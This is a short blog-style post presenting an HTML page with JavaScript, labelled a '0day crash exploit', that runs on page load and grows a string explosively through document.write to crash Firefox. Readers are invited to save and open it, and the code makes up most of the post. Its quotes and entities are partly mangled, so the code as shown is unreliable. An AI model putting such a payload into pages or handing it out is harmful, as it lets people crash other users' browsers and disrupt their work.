FireFox Crasher

Try Saving below code as html and open with FireFox. It will crash firefox. It’s 0day crash exploit. You are warned.

Good Luck!

 <html>
<head>
<title>Mozilla Firefox Crash 0Day</title>
<body onload=”javascript:coolkaveh();”>
<script language=”JavaScript”>
function coolkaveh(){
var buf = &#039;x41x41x41&#039;
for(i=0; i <= 800 ; ++i){
buf+=buf+buf //Written by vscen
document.write(buf); //Written by vscen
}
}
</script>
</head>
</body>
</html>

Just a reference…;)

error: Content is protected !!